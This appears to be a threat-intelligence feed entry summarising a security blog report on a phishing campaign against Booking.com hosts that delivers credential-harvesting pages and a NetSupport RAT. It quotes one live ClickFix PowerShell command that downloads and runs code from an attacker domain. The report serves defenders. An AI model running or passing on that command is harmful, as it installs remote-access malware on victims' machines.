Reviews used to attack Booking.com hosts with phishing and malware · Blog · Sublime Security
ID: ea722ab9-7f03-5e33-a08c-bf78e2f0ccdc
STIX ID: report--ea722ab9-7f03-5e33-a08c-bf78e2f0ccdc
Feed Name: Sublime Security Blog
Sublime observed an active campaign targeting Booking.com hosts that uses review-themed phishing emails to deliver credential-harvesting pages and a ClickFix-style malware flow. Attackers use link spoofing and redirect chains to fake Booking.com links, deploy a clipboard-based PowerShell downloader (powershell -wi mi -EP B -c iex(irm apy-morpho.org)), and fetch a payload that installs a maliciously configured NetSupport RAT with persistence and C2 endpoints; the report includes domains, scripts, sample payloads, and detection signals.
Your team is not currently subscribed to this feed. You must subscribe to it in order to see this post.
